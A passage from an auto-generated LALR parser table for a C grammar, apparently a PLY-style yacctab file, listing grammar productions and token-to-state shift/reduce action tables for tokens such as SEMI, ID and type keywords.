argument_expression_list COMMA assignment_expression\n identifier : ID constant : INT_CONST_DEC\n | INT_CONST_OCT\n | INT_CONST_HEX\n | INT_CONST_BIN\n constant : FLOAT_CONST\n | HEX_FLOAT_CONST\n constant : CHAR_CONST\n | WCHAR_CONST\n unified_string_literal : STRING_LITERAL\n | unified_string_literal STRING_LITERAL\n unified_wstring_literal : WSTRING_LITERAL\n | unified_wstring_literal WSTRING_LITERAL\n brace_open : LBRACE\n brace_close : RBRACE\n empty : '
_lr_action_items = {'$end':([0,1,2,3,4,5,6,7,8,9,13,14,55,77,78,105,144,210,264,],[-309,0,-58,-59,-60,-62,-63,-64,-65,-66,-67,-68,-61,-83,-69,-70,-308,-71,-202,]),'SEMI':([0,2,4,5,6,7,8,9,11,12,13,14,15,17,18,19,20,21,22,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,60,61,62,63,64,65,66,67,69,70,72,73,74,75,76,77,78,81,82,83,84,85,86,87,88,89,90,91,92,98,99,101,102,103,104,105,106,108,110,127,131,139,140,141,142,143,144,145,146,147,148,151,152,153,154,155,156,157,158,159,160,161,162,163,166,169,172,175,176,177,178,179,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,227,228,242,243,246,249,250,251,252,253,254,255,256,257,258,259,260,261,263,264,265,266,267,269,270,272,273,282,283,284,285,286,287,288,289,325,326,327,329,330,331,333,334,349,350,351,352,371,372,375,376,377,380,381,382,384,387,391,395,396,397,398,399,400,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,431,438,439,442,443,456,457,458,460,462,463,464,466,467,469,470,473,475,479,480,490,491,493,494,496,498,507,508,510,513,518,519,520,522,525,526,528,],[9,9,-60,-62,-63,-64,-65,-66,-309,77,-67,-68,-52,-309,-309,-309,-116,-93,-309,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,-309,-309,-162,-89,-90,-91,-92,-81,-19,-20,-120,-122,-163,-54,-37,-83,-69,-53,-86,-9,-10,-87,-88,-94,-82,-15,-16,-124,-126,-152,-153,-307,-132,-133,146,-70,-309,-162,-55,-294,-30,146,146,146,-135,-142,-308,-309,-145,-146,-130,-13,-309,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,-294,273,-14,-309,286,287,289,-219,-222,-257,-236,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-71,-121,-38,-123,-177,-35,-36,-125,-127,-154,146,-137,146,-139,-134,-143,377,-128,-129,-25,-26,-147,-149,-131,-202,-201,-13,-309,-235,-257,-309,-218,-78,-80,-309,398,-214,-215,399,-217,-279,-280,-260,-261,-262,-263,-304,-306,-4
3,-44,-31,-34,-155,-156,-136,-138,-144,-151,-203,-309,-205,-287,-220,-79,466,-309,-213,-216,-223,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,-250,-251,-252,-253,-254,-255,-256,-274,-275,-276,-277,-278,-178,-39,-42,-32,-33,-148,-150,-204,-309,-258,-309,-309,-309,497,-272,-273,-264,-179,-40,-41,-206,-80,-208,-209,511,-237,-309,-281,520,-288,-207,-282,-210,-309,-309,-212,-211,]),'PPHASH':([0,2,4,5,6,7,8,9,13,14,55,77,78,105,144,210,264,],[13,13,-60,-62,-63,-64,-65,-66,-67,-68,-61,-83,-69,-70,-308,-71,-202,]),'PPPRAGMA':([0,2,4,5,6,7,8,9,13,14,55,77,78,101,104,105,106,139,140,141,143,144,146,147,152,153,154,155,156,157,158,159,160,161,162,172,210,249,251,254,264,265,267,272,273,282,283,286,287,289,377,381,382,384,395,398,399,458,460,463,464,490,491,493,494,507,518,520,522,525,526,528,],[14,14,-60,-62,-63,-64,-65,-66,-67,-68,-61,-83,-69,-307,14,-70,14,14,14,14,-142,-308,-145,-146,14,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,14,-71,14,14,-143,-202,-201,14,14,-218,14,-80,-214,-215,-217,-144,-203,14,-205,-79,-213,-216,-204,14,14,14,-206,-80,-208,-209,14,-207,-210,14,14,-212,-211,]),'ID':([0,2,4,5,6,7,8,9,11,13,14,16,17,18,19,20,21,22,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,60,61,63,64,65,66,68,71,77,78,79,80,82,83,84,85,86,87,94,95,96,97,98,99,100,101,102,103,105,106,111,113,114,115,116,117,118,126,129,130,132,133,134,135,142,144,145,148,152,153,154,155,156,157,158,159,160,161,162,164,168,172,174,177,183,184,185,187,188,189,190,191,193,194,210,215,216,217,218,222,225,226,230,234,238,239,246,247,248,250,252,253,256,257,262,263,264,265,267,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,328,332,338,339,340,343,344,346,347,348,360,361,364,368,369,371,372,375,376,378,379,381,382,384,386,395,397,398,399,432,434,444,445,446,454,458,459,460,461,463,464,465,466,468,471,474,
476,477,482,483,484,490,491,493,494,497,507,509,511,514,515,518,520,522,525,526,528,],[23,23,-60,-62,-63,-64,-65,-66,23,-67,-68,23,-309,-309,-309,-116,-93,23,23,-97,-309,-113,-114,-115,-221,98,102,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-140,-141,-61,23,23,-89,-90,-91,-92,23,23,-83,-69,-309,127,-86,-9,-10,-87,-88,-94,-164,-27,-28,-166,-152,-153,138,-307,-132,-133,-70,163,23,127,-309,127,127,-309,-28,23,23,127,-165,-167,138,138,-135,-308,23,-130,163,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,127,127,163,285,127,127,127,127,127,-266,-267,-268,-265,-269,-270,-71,-309,127,-309,-28,-266,127,127,127,23,23,127,-154,138,127,-137,-139,-134,-128,-129,127,-131,-202,-201,163,127,163,-218,127,127,127,127,163,-80,127,-214,-215,-217,127,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,127,127,127,127,127,127,127,127,127,127,127,127,127,127,127,127,127,127,127,127,127,424,426,127,127,-11,127,-12,127,127,-266,127,127,-309,127,23,-266,127,-155,-156,-136,-138,23,127,-203,163,-205,127,-79,127,-213,-216,-309,-182,127,-309,-28,-266,-204,127,163,-309,163,163,127,127,127,127,127,127,-11,-266,127,127,-206,-80,-208,-209,127,163,-309,127,127,127,-207,-210,163,163,-212,-211,]),'LPAREN':([0,2,4,5,6,7,8,9,11,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,60,61,63,64,65,66,68,71,75,76,77,78,79,81,82,83,84,85,86,87,94,95,96,97,98,99,101,102,103,105,106,110,111,113,114,116,117,118,126,127,129,130,131,132,133,142,144,145,148,152,153,154,155,156,157,158,159,160,161,162,163,164,167,168,170,171,172,173,177,182,183,184,185,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,212,215,216,217,218,222,225,226,227,228,234,235,238,239,240,241,246,248,250,252,253,256,257,262,263,264,265,267,271,272,273,274,277,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,3
13,314,315,316,317,318,319,320,321,322,325,326,328,332,333,334,338,339,340,343,346,347,348,349,350,351,352,358,359,360,364,368,369,371,372,375,376,378,379,381,382,384,386,387,389,390,394,395,397,398,399,422,424,425,426,427,432,434,438,439,442,443,444,445,446,449,450,451,452,454,458,459,460,461,463,464,465,466,468,469,470,471,476,477,479,480,482,483,484,485,486,487,488,489,490,491,493,494,497,503,504,507,508,509,511,513,515,516,517,518,519,520,522,525,526,528,],[24,24,-60,-62,-63,-64,-65,-66,71,-67,-68,80,24,-309,-309,-309,-116,-93,24,-29,24,-97,-309,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,71,24,-89,-90,-91,-92,71,71,115,-37,-83,-69,-309,80,-86,-9,-10,-87,-88,-94,-164,-27,-28,-166,-152,-153,-307,-132,-133,-70,168,115,71,168,-309,168,-309,-28,238,-294,71,168,-30,-165,-167,-135,-308,71,-130,168,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,-294,271,274,168,279,280,168,284,168,322,328,328,271,332,-266,-267,-268,-265,-271,-269,-270,-283,-284,-285,-286,335,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-71,-38,-309,168,-309,-28,-266,168,168,-35,-36,238,361,238,168,-45,370,-154,271,-137,-139,-134,-128,-129,271,-131,-202,-201,168,168,168,-218,168,390,168,168,168,168,-80,168,-214,-215,-217,168,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,168,271,271,271,271,271,271,271,271,271,271,271,271,271,271,271,271,271,271,168,168,-279,-280,168,168,-304,-306,-11,168,-12,271,-266,168,168,-43,-44,-31,-34,361,370,-309,238,-266,168,-155,-156,-136,-138,71,271,-203,168,-205,271,-287,390,390,465,-79,168,-213,-216,-274,-275,-276,-277,-278,-309,-182,-39,-42,-32,-33,168,-309,-28,-191,-197,-193,-195,-266,-204,271,168,-309,168,168,168,168,271,-272,-273,168,168,-11,-40,-41,-266,168,168,-50,-51,-192,-194,-196,-206,-80,-208,-209,168,-46,-49,168,-281,-309,168,-288,168,-47,-48,-207,-282,-210,168,168,-212,-211,]),'TIMES':([0,2,4,5,6,7,8,9,11,13,14,17,18,19,20,21,22,24,25,26,27,28,29,30,33,34,35,36,37,38,39,40,41,42
,43,44,45,46,47,48,49,50,51,52,55,60,61,63,64,65,66,71,77,78,79,82,83,84,85,86,87,94,95,96,97,98,99,101,102,103,105,106,111,113,114,116,117,118,126,127,129,130,133,142,144,145,148,152,153,154,155,156,157,158,159,160,161,162,163,164,168,172,177,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,200,201,202,203,204,205,206,207,208,209,210,215,216,217,218,222,225,226,238,239,246,248,250,252,253,256,257,262,263,264,265,267,270,271,272,273,274,277,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,325,326,327,328,329,330,331,332,333,334,338,339,340,343,346,347,348,360,368,369,371,372,375,376,378,379,381,382,384,386,387,390,395,397,398,399,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,432,434,444,445,446,454,458,459,460,461,462,463,464,465,466,468,469,470,471,473,476,477,482,483,484,490,491,493,494,497,507,508,509,511,513,515,518,519,520,522,525,526,528,],[26,26,-60,-62,-63,-64,-65,-66,26,-67,-68,-309,-309,-309,-116,-93,26,26,-97,-309,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,26,26,-89,-90,-91,-92,26,-83,-69,-309,-86,-9,-10,-87,-88,-94,26,-27,-28,-166,-152,-153,-307,-132,-133,-70,188,26,188,-309,222,-309,-28,26,-294,26,188,-167,-135,-308,26,-130,188,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,-294,188,188,188,188,-257,303,-259,188,188,188,-238,188,-266,-267,-268,-265,-271,-269,-270,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-71,-309,346,-309,-28,-266,188,188,26,368,-154,188,-137,-139,-134,-128,-129,188,-131,-202,-201,188,-257,188,188,-218,188,26,188,188,188,188,-80,188,-214,-215,-217,188,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,188,-279,-280,-260,188,-261,-262,-263,188,-304,-306,-11,188,-12,18
8,-266,188,188,-309,-266,454,-155,-156,-136,-138,26,188,-203,188,-205,188,-287,26,-79,188,-213,-216,-239,-240,-241,303,303,303,303,303,303,303,303,303,303,303,303,303,303,303,-274,-275,-276,-277,-278,-309,-182,482,-309,-28,-266,-204,188,188,-309,-258,188,188,188,188,188,-272,-273,188,-264,188,-11,-266,188,188,-206,-80,-208,-209,188,188,-281,-309,188,-288,188,-207,-282,-210,188,188,-212,-211,]),'TYPEID':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,22,23,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,58,59,60,61,62,63,64,65,66,68,71,77,78,80,81,82,83,84,85,86,87,94,95,96,97,98,99,101,102,103,104,105,106,107,111,115,126,128,129,131,132,133,139,140,141,142,143,144,145,146,147,148,149,152,153,154,155,156,157,158,159,160,161,162,168,210,227,228,229,234,238,246,249,250,251,252,253,254,256,257,263,264,265,271,273,282,283,284,286,287,289,323,324,328,332,335,351,352,361,370,371,372,375,376,377,378,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[30,30,-60,-62,-63,-64,-65,-66,30,76,-67,-68,-52,-309,-309,-309,-116,-93,30,-29,-97,-309,-113,-114,-115,-221,99,103,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-140,-141,-61,30,-84,76,30,30,-89,-90,-91,-92,76,76,-83,-69,30,-53,-86,-9,-10,-87,-88,-94,-164,-27,-28,-166,-152,-153,-307,-132,-133,30,-70,30,-85,76,30,240,30,76,-30,-165,-167,30,30,30,-135,-142,-308,76,-145,-146,-130,30,30,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,30,-71,-35,-36,30,240,30,-154,30,-137,30,-139,-134,-143,-128,-129,-131,-202,-201,30,-218,-78,-80,30,-214,-215,-217,425,427,30,30,30,-31,-34,30,30,-155,-156,-136,-138,-144,76,-203,-205,30,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'ENUM':([0,2,4,5,6,7,8,9,10,13,14,15,17,18,19,22,23,25,45,46,47,48,49,50,51,52,55,58,59,61,62,77,78,80,81,82,83,84,85,86,97,101,104,105,106,107,115,128,131,133,139,140,141,143,144,146,147,149,152,153,154,155,156,157,158,159,160,161,162,168,210,
227,228,229,238,249,251,254,264,265,271,273,282,283,284,286,287,289,328,332,335,351,352,361,370,377,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[31,31,-60,-62,-63,-64,-65,-66,31,-67,-68,-52,-309,-309,-309,31,-29,-97,-117,-118,-119,-95,-96,-98,-99,-100,-61,31,-84,31,31,-83,-69,31,-53,-86,-9,-10,-87,-88,-166,-307,31,-70,31,-85,31,31,-30,-167,31,31,31,-142,-308,-145,-146,31,31,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,31,-71,-35,-36,31,31,31,31,-143,-202,-201,31,-218,-78,-80,31,-214,-215,-217,31,31,31,-31,-34,31,31,-144,-203,-205,31,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'VOID':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,22,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,61,62,63,64,65,66,77,78,80,81,82,83,84,85,86,87,97,98,99,101,102,103,104,105,106,107,115,126,128,131,133,139,140,141,142,143,144,145,146,147,148,149,152,153,154,155,156,157,158,159,160,161,162,168,210,227,228,229,238,246,249,250,251,252,253,254,256,257,263,264,265,271,273,277,282,283,284,286,287,289,328,332,335,351,352,361,370,371,372,375,376,377,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[33,33,-60,-62,-63,-64,-65,-66,33,33,-67,-68,-52,-309,-309,-309,-116,-93,33,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,33,-84,33,33,33,-89,-90,-91,-92,-83,-69,33,-53,-86,-9,-10,-87,-88,-94,-166,-152,-153,-307,-132,-133,33,-70,33,-85,33,33,33,-30,-167,33,33,33,-135,-142,-308,33,-145,-146,-130,33,33,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,33,-71,-35,-36,33,33,-154,33,-137,33,-139,-134,-143,-128,-129,-131,-202,-201,33,-218,33,-78,-80,33,-214,-215,-217,33,33,33,-31,-34,33,33,-155,-156,-136,-138,-144,-203,-205,33,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'_BOOL':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,22,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50
,51,52,55,58,59,60,61,62,63,64,65,66,77,78,80,81,82,83,84,85,86,87,97,98,99,101,102,103,104,105,106,107,115,126,128,131,133,139,140,141,142,143,144,145,146,147,148,149,152,153,154,155,156,157,158,159,160,161,162,168,210,227,228,229,238,246,249,250,251,252,253,254,256,257,263,264,265,271,273,277,282,283,284,286,287,289,328,332,335,351,352,361,370,371,372,375,376,377,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[34,34,-60,-62,-63,-64,-65,-66,34,34,-67,-68,-52,-309,-309,-309,-116,-93,34,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,34,-84,34,34,34,-89,-90,-91,-92,-83,-69,34,-53,-86,-9,-10,-87,-88,-94,-166,-152,-153,-307,-132,-133,34,-70,34,-85,34,34,34,-30,-167,34,34,34,-135,-142,-308,34,-145,-146,-130,34,34,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,34,-71,-35,-36,34,34,-154,34,-137,34,-139,-134,-143,-128,-129,-131,-202,-201,34,-218,34,-78,-80,34,-214,-215,-217,34,34,34,-31,-34,34,34,-155,-156,-136,-138,-144,-203,-205,34,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'CHAR':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,22,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,61,62,63,64,65,66,77,78,80,81,82,83,84,85,86,87,97,98,99,101,102,103,104,105,106,107,115,126,128,131,133,139,140,141,142,143,144,145,146,147,148,149,152,153,154,155,156,157,158,159,160,161,162,168,210,227,228,229,238,246,249,250,251,252,253,254,256,257,263,264,265,271,273,277,282,283,284,286,287,289,328,332,335,351,352,361,370,371,372,375,376,377,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[35,35,-60,-62,-63,-64,-65,-66,35,35,-67,-68,-52,-309,-309,-309,-116,-93,35,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,35,-84,35,35,35,-89,-90,-91,-92,-83,-69,35,-53,-86,-9,-10,-87,-88,-94,-166,-152,-153,-307,-132,-133,35,-70,35,-85,35,35,
35,-30,-167,35,35,35,-135,-142,-308,35,-145,-146,-130,35,35,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,35,-71,-35,-36,35,35,-154,35,-137,35,-139,-134,-143,-128,-129,-131,-202,-201,35,-218,35,-78,-80,35,-214,-215,-217,35,35,35,-31,-34,35,35,-155,-156,-136,-138,-144,-203,-205,35,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'SHORT':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,22,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,61,62,63,64,65,66,77,78,80,81,82,83,84,85,86,87,97,98,99,101,102,103,104,105,106,107,115,126,128,131,133,139,140,141,142,143,144,145,146,147,148,149,152,153,154,155,156,157,158,159,160,161,162,168,210,227,228,229,238,246,249,250,251,252,253,254,256,257,263,264,265,271,273,277,282,283,284,286,287,289,328,332,335,351,352,361,370,371,372,375,376,377,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[36,36,-60,-62,-63,-64,-65,-66,36,36,-67,-68,-52,-309,-309,-309,-116,-93,36,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,36,-84,36,36,36,-89,-90,-91,-92,-83,-69,36,-53,-86,-9,-10,-87,-88,-94,-166,-152,-153,-307,-132,-133,36,-70,36,-85,36,36,36,-30,-167,36,36,36,-135,-142,-308,36,-145,-146,-130,36,36,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,36,-71,-35,-36,36,36,-154,36,-137,36,-139,-134,-143,-128,-129,-131,-202,-201,36,-218,36,-78,-80,36,-214,-215,-217,36,36,36,-31,-34,36,36,-155,-156,-136,-138,-144,-203,-205,36,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'INT':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,22,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,61,62,63,64,65,66,77,78,80,81,82,83,84,85,86,87,97,98,99,101,102,103,104,105,106,107,115,126,128,131,133,139,140,141,142,143,144,145,146,147,148,149,152,153,154,155,156,157,158,159,160,161,162,168,210,227,228,229,238,246,249,250,251,252,253,254,256,257,263,264,265,27
1,273,277,282,283,284,286,287,289,328,332,335,351,352,361,370,371,372,375,376,377,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[37,37,-60,-62,-63,-64,-65,-66,37,37,-67,-68,-52,-309,-309,-309,-116,-93,37,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,37,-84,37,37,37,-89,-90,-91,-92,-83,-69,37,-53,-86,-9,-10,-87,-88,-94,-166,-152,-153,-307,-132,-133,37,-70,37,-85,37,37,37,-30,-167,37,37,37,-135,-142,-308,37,-145,-146,-130,37,37,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,37,-71,-35,-36,37,37,-154,37,-137,37,-139,-134,-143,-128,-129,-131,-202,-201,37,-218,37,-78,-80,37,-214,-215,-217,37,37,37,-31,-34,37,37,-155,-156,-136,-138,-144,-203,-205,37,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'LONG':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,22,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,61,62,63,64,65,66,77,78,80,81,82,83,84,85,86,87,97,98,99,101,102,103,104,105,106,107,115,126,128,131,133,139,140,141,142,143,144,145,146,147,148,149,152,153,154,155,156,157,158,159,160,161,162,168,210,227,228,229,238,246,249,250,251,252,253,254,256,257,263,264,265,271,273,277,282,283,284,286,287,289,328,332,335,351,352,361,370,371,372,375,376,377,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[38,38,-60,-62,-63,-64,-65,-66,38,38,-67,-68,-52,-309,-309,-309,-116,-93,38,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,38,-84,38,38,38,-89,-90,-91,-92,-83,-69,38,-53,-86,-9,-10,-87,-88,-94,-166,-152,-153,-307,-132,-133,38,-70,38,-85,38,38,38,-30,-167,38,38,38,-135,-142,-308,38,-145,-146,-130,38,38,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,38,-71,-35,-36,38,38,-154,38,-137,38,-139,-134,-143,-128,-129,-131,-202,-201,38,-218,38,-78,-80,38,-214,-215,-217,38,38,38,-31,-34,38,38,-155,-156,-136,-138,-144,-203,-205,38,-79,-213
,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'FLOAT':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,22,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,61,62,63,64,65,66,77,78,80,81,82,83,84,85,86,87,97,98,99,101,102,103,104,105,106,107,115,126,128,131,133,139,140,141,142,143,144,145,146,147,148,149,152,153,154,155,156,157,158,159,160,161,162,168,210,227,228,229,238,246,249,250,251,252,253,254,256,257,263,264,265,271,273,277,282,283,284,286,287,289,328,332,335,351,352,361,370,371,372,375,376,377,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[39,39,-60,-62,-63,-64,-65,-66,39,39,-67,-68,-52,-309,-309,-309,-116,-93,39,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,39,-84,39,39,39,-89,-90,-91,-92,-83,-69,39,-53,-86,-9,-10,-87,-88,-94,-166,-152,-153,-307,-132,-133,39,-70,39,-85,39,39,39,-30,-167,39,39,39,-135,-142,-308,39,-145,-146,-130,39,39,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,39,-71,-35,-36,39,39,-154,39,-137,39,-139,-134,-143,-128,-129,-131,-202,-201,39,-218,39,-78,-80,39,-214,-215,-217,39,39,39,-31,-34,39,39,-155,-156,-136,-138,-144,-203,-205,39,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'DOUBLE':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,22,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,61,62,63,64,65,66,77,78,80,81,82,83,84,85,86,87,97,98,99,101,102,103,104,105,106,107,115,126,128,131,133,139,140,141,142,143,144,145,146,147,148,149,152,153,154,155,156,157,158,159,160,161,162,168,210,227,228,229,238,246,249,250,251,252,253,254,256,257,263,264,265,271,273,277,282,283,284,286,287,289,328,332,335,351,352,361,370,371,372,375,376,377,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[40,40,-60,-62,-63,-64,-65,-66,40,40,-67,-68,-52,-309,-309,-309,-116,-93,40,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-1
06,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,40,-84,40,40,40,-89,-90,-91,-92,-83,-69,40,-53,-86,-9,-10,-87,-88,-94,-166,-152,-153,-307,-132,-133,40,-70,40,-85,40,40,40,-30,-167,40,40,40,-135,-142,-308,40,-145,-146,-130,40,40,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,40,-71,-35,-36,40,40,-154,40,-137,40,-139,-134,-143,-128,-129,-131,-202,-201,40,-218,40,-78,-80,40,-214,-215,-217,40,40,40,-31,-34,40,40,-155,-156,-136,-138,-144,-203,-205,40,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'_COMPLEX':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,22,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,61,62,63,64,65,66,77,78,80,81,82,83,84,85,86,87,97,98,99,101,102,103,104,105,106,107,115,126,128,131,133,139,140,141,142,143,144,145,146,147,148,149,152,153,154,155,156,157,158,159,160,161,162,168,210,227,228,229,238,246,249,250,251,252,253,254,256,257,263,264,265,271,273,277,282,283,284,286,287,289,328,332,335,351,352,361,370,371,372,375,376,377,381,384,390,395,398,399,442,443,458,490,491,493,494,518,520,526,528,],[41,41,-60,-62,-63,-64,-65,-66,41,41,-67,-68,-52,-309,-309,-309,-116,-93,41,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,41,-84,41,41,41,-89,-90,-91,-92,-83,-69,41,-53,-86,-9,-10,-87,-88,-94,-166,-152,-153,-307,-132,-133,41,-70,41,-85,41,41,41,-30,-167,41,41,41,-135,-142,-308,41,-145,-146,-130,41,41,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,41,-71,-35,-36,41,41,-154,41,-137,41,-139,-134,-143,-128,-129,-131,-202,-201,41,-218,41,-78,-80,41,-214,-215,-217,41,41,41,-31,-34,41,41,-155,-156,-136,-138,-144,-203,-205,41,-79,-213,-216,-32,-33,-204,-206,-80,-208,-209,-207,-210,-212,-211,]),'SIGNED':([0,2,4,5,6,7,8,9,10,11,13,14,15,17,18,19,20,21,22,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,58,59,60,61,62,63,64,65,66,77,78,80,81,82,83,84,85,86,87,97,98,99,101,102,103
